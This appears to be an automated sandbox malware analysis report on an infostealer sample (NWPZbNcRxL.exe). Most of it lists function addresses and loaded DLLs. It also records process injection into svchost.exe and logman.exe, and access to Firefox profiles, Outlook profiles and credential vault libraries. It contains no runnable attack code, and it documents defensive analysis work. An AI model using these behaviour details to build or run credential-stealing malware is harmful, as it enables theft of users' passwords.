Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03930CF2	2_2_03930CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940C00	2_2_03940C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0398739A	2_2_0398739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F132D	2_2_039F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392D34C	2_2_0392D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039452A0	2_2_039452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395B2C0	2_2_0395B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E12ED	2_2_039E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394B1B0	2_2_0394B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A0B16B	2_2_03A0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392F172	2_2_0392F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0397516C	2_2_0397516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039EF0CC	2_2_039EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039470C0	2_2_039470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F70E9	2_2_039F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FF0E0	2_2_039FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FF7B0	2_2_039FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F16CC	2_2_039F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03985630	2_2_03985630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DD5B0	2_2_039DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A095C3	2_2_03A095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F7571	2_2_039F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FF43F	2_2_039FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03931460	2_2_03931460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395FB80	2_2_0395FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B5BF0	2_2_039B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0397DBF9	2_2_0397DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FFB76	2_2_039FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DDAAC	2_2_039DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03985AA0	2_2_03985AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E1AA3	2_2_039E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039EDAC6	2_2_039EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FFA49	2_2_039FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F7A46	2_2_039F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B3A6C	2_2_039B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D5910	2_2_039D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03949950	2_2_03949950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395B950	2_2_0395B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039438E0	2_2_039438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AD800	2_2_039AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03941F92	2_2_03941F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FFFB1	2_2_039FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03903FD2	2_2_03903FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03903FD5	2_2_03903FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FFF09	2_2_039FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03949EB0	2_2_03949EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395FDC0	2_2_0395FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F1D5A	2_2_039F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03943D40	2_2_03943D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F7D73	2_2_039F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FFCF2	2_2_039FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B9C32	2_2_039B9C32
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0320A352	5_2_0320A352
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_032103E6	5_2_032103E6
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0315E3F0	5_2_0315E3F0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031F0274	5_2_031F0274
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031D02C0	5_2_031D02C0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031EA118	5_2_031EA118
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03140100	5_2_03140100
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031D8158	5_2_031D8158
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_032041A2	5_2_032041A2
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_032101AA	5_2_032101AA
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_032081CC	5_2_032081CC
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031E2000	5_2_031E2000
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03174750	5_2_03174750
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03150770	5_2_03150770
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0314C7C0	5_2_0314C7C0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0316C6E0	5_2_0316C6E0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03150535	5_2_03150535
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03210591	5_2_03210591
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031F4420	5_2_031F4420
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03202446	5_2_03202446
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031FE4F6	5_2_031FE4F6
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0320AB40	5_2_0320AB40
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03206BD7	5_2_03206BD7
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0314EA80	5_2_0314EA80
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03166962	5_2_03166962
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0321A9A6	5_2_0321A9A6
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031529A0	5_2_031529A0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03152840	5_2_03152840
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0315A840	5_2_0315A840
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031368B8	5_2_031368B8
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0317E8F0	5_2_0317E8F0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03170F30	5_2_03170F30
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031F2F30	5_2_031F2F30
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03192F28	5_2_03192F28
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031C4F40	5_2_031C4F40
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031CEFA0	5_2_031CEFA0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03142FC8	5_2_03142FC8
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0315CFE0	5_2_0315CFE0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0320EE26	5_2_0320EE26
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03150E59	5_2_03150E59
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03162E90	5_2_03162E90
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0320CE93	5_2_0320CE93
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0320EEDB	5_2_0320EEDB
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031ECD1F	5_2_031ECD1F
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0315AD00	5_2_0315AD00
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03168DBF	5_2_03168DBF
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0314ADE0	5_2_0314ADE0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03150C00	5_2_03150C00
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031F0CB5	5_2_031F0CB5
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03140CF2	5_2_03140CF2
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0320132D	5_2_0320132D
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0313D34C	5_2_0313D34C
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0319739A	5_2_0319739A
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031552A0	5_2_031552A0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0316B2C0	5_2_0316B2C0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031F12ED	5_2_031F12ED
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0321B16B	5_2_0321B16B
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0313F172	5_2_0313F172
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0318516C	5_2_0318516C
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0315B1B0	5_2_0315B1B0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0320F0E0	5_2_0320F0E0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_032070E9	5_2_032070E9
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031FF0CC	5_2_031FF0CC
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031570C0	5_2_031570C0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0320F7B0	5_2_0320F7B0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03195630	5_2_03195630
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_032016CC	5_2_032016CC
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03207571	5_2_03207571
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031ED5B0	5_2_031ED5B0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_032195C3	5_2_032195C3
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0320F43F	5_2_0320F43F
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03141460	5_2_03141460
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0320FB76	5_2_0320FB76
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0316FB80	5_2_0316FB80
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0318DBF9	5_2_0318DBF9
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031C5BF0	5_2_031C5BF0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03207A46	5_2_03207A46
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0320FA49	5_2_0320FA49
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031C3A6C	5_2_031C3A6C
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031EDAAC	5_2_031EDAAC
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03195AA0	5_2_03195AA0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031F1AA3	5_2_031F1AA3
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031FDAC6	5_2_031FDAC6
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031E5910	5_2_031E5910
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03159950	5_2_03159950
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0316B950	5_2_0316B950
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031BD800	5_2_031BD800
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031538E0	5_2_031538E0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0320FF09	5_2_0320FF09
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03151F92	5_2_03151F92
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0320FFB1	5_2_0320FFB1
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03113FD2	5_2_03113FD2
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03113FD5	5_2_03113FD5
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03159EB0	5_2_03159EB0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03207D73	5_2_03207D73
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03153D40	5_2_03153D40
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_03201D5A	5_2_03201D5A
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0316FDC0	5_2_0316FDC0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_031C9C32	5_2_031C9C32
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0320FCF2	5_2_0320FCF2
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_02741D80	5_2_02741D80
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0273CE90	5_2_0273CE90
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0273AE80	5_2_0273AE80
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0273AFD0	5_2_0273AFD0
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0273AFC4	5_2_0273AFC4
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0273CC70	5_2_0273CC70
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0273CC68	5_2_0273CC68
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_02743620	5_2_02743620
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0274361F	5_2_0274361F
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_02745420	5_2_02745420
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0275BB00	5_2_0275BB00
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_02F6E338	5_2_02F6E338
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_02F6E7EC	5_2_02F6E7EC
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_02F6E453	5_2_02F6E453
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_02F6D8B8	5_2_02F6D8B8

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 039BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0392B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03975130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 039AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03987E54 appears 111 times
Source: C:\Windows\SysWOW64\logman.exe	Code function: String function: 03197E54 appears 111 times
Source: C:\Windows\SysWOW64\logman.exe	Code function: String function: 031CF290 appears 105 times
Source: C:\Windows\SysWOW64\logman.exe	Code function: String function: 031BEA12 appears 86 times
Source: C:\Windows\SysWOW64\logman.exe	Code function: String function: 03185130 appears 58 times
Source: C:\Windows\SysWOW64\logman.exe	Code function: String function: 0313B970 appears 280 times
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: String function: 00C17DE1 appears 36 times
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: String function: 00C30AE3 appears 70 times
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: String function: 00C38900 appears 42 times

Source: NWPZbNcRxL.exe, 00000000.00000003.2059826106.000000000397D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs NWPZbNcRxL.exe
Source: NWPZbNcRxL.exe, 00000000.00000003.2061070599.00000000037D3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs NWPZbNcRxL.exe

Source: NWPZbNcRxL.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@16/12

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C7A06A GetLastError,FormatMessageW,

0_2_00C7A06A

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C681CB AdjustTokenPrivileges,CloseHandle,		0_2_00C681CB
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00C687E1

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C7B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00C7B3FB

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C8EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00C8EE0D

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C7C397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_00C7C397

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Code function: 0_2_00C14E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00C14E89

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

File created: C:\Users\user\AppData\Local\Temp\autCA7F.tmp

Jump to behavior

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Command line argument: (l

0_2_00C147D0

Source: NWPZbNcRxL.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: logman.exe, 00000005.00000003.2596274159.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4503848678.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4503848678.0000000002C0F000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000003.2596138045.0000000002BBF000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4503848678.0000000002BEB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: NWPZbNcRxL.exe	ReversingLabs: Detection: 71%
Source: NWPZbNcRxL.exe	Virustotal: Detection: 45%

Source: unknown	Process created: C:\Users\user\Desktop\NWPZbNcRxL.exe "C:\Users\user\Desktop\NWPZbNcRxL.exe"
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NWPZbNcRxL.exe"
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	Process created: C:\Windows\SysWOW64\logman.exe "C:\Windows\SysWOW64\logman.exe"
Source: C:\Windows\SysWOW64\logman.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NWPZbNcRxL.exe"	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	Process created: C:\Windows\SysWOW64\logman.exe "C:\Windows\SysWOW64\logman.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\logman.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\logman.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: NWPZbNcRxL.exe

Static file information: File size 1255936 > 1048576

Source: NWPZbNcRxL.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: NWPZbNcRxL.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: NWPZbNcRxL.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: NWPZbNcRxL.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: NWPZbNcRxL.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: NWPZbNcRxL.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: NWPZbNcRxL.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: logman.pdb source: svchost.exe, 00000002.00000003.2384783165.0000000003232000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384691800.000000000321B000.00000004.00000020.00020000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000004.00000002.4504092986.0000000001538000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WnOFOMnqmLQAP.exe, 00000004.00000002.4503538200.000000000008E000.00000002.00000001.01000000.00000005.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000000.2483941200.000000000008E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: NWPZbNcRxL.exe, 00000000.00000003.2061708811.0000000003850000.00000004.00001000.00020000.00000000.sdmp, NWPZbNcRxL.exe, 00000000.00000003.2061525090.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322396979.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2417369880.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2320241917.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2417369880.0000000003900000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000005.00000003.2417406704.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000003.2419688042.0000000002F68000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4504779497.00000000032AE000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4504779497.0000000003110000.00000040.00001000.00020000.00000000.sdmp
